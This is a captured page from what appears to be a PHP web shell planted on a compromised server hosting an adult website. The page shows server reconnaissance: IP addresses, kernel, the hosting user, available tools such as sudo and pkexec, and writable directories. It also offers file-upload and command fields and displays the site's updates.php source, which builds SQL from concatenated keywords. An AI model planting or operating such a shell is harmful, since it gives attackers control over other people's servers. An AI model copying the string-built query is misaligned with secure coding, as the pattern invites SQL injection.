403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/pornstarhoneys.com/public_html/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/pornstarhoneys.com/public_html/modules/updates.php
<?php	// updates.php
	echo	"\n<table align='center' border='0' cellpadding='5' cellspacing='0'>\n";
	$column = 0;

	$z = TYPE ;
	$keys = explode(';', $z);
	$word = " and (word LIKE '%".$keys[0]."%'";
	for($x=1; $x < count($keys); $x++) {
		$word .= " OR word LIKE '%".$keys[$x]."%'";
	}
	$word .= ")";

	$qry = q("SELECT * FROM sets WHERE dates <= '$timestamp' $word ORDER BY dates DESC LIMIT 0,10", $link);
//	$qry = q("SELECT * FROM sets WHERE dates <= '$timestamp' AND $word LIKE %HoneySchool% ORDER BY dates DESC LIMIT 0,10", $link);
	while ($sets = f($qry)) {
		$set_date = date("F d Y", $sets->dates);
		$column++;
		if ($column == 1) {
			echo	"<tr>\n";
		}


		
		$girlname = str_replace('_', ' ', $sets->girlname);
		$girlname = str_replace('-', ' ', $sets->girlname);
		$babelink = str_replace(' ', '-', $girlname);
		$page = "<a class='babe-link' href='honeys/$babelink.php?$tracking&start=$start'>";
		
		echo	"<td class='icon' align='center' valign='top' width='140'>$page<img src='$sets->icon' border='0' alt='$sets->name'><br><div class='date'>$set_date</div><div class='update-text'>$sets->name</div></td>\n";
		if ($column == 5) {
			echo	"</tr>\n";
			$column = 0;
		}
	}
	if ($column != 0) {
		echo	"</tr>\n";
	}
	echo	"</table>\n";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit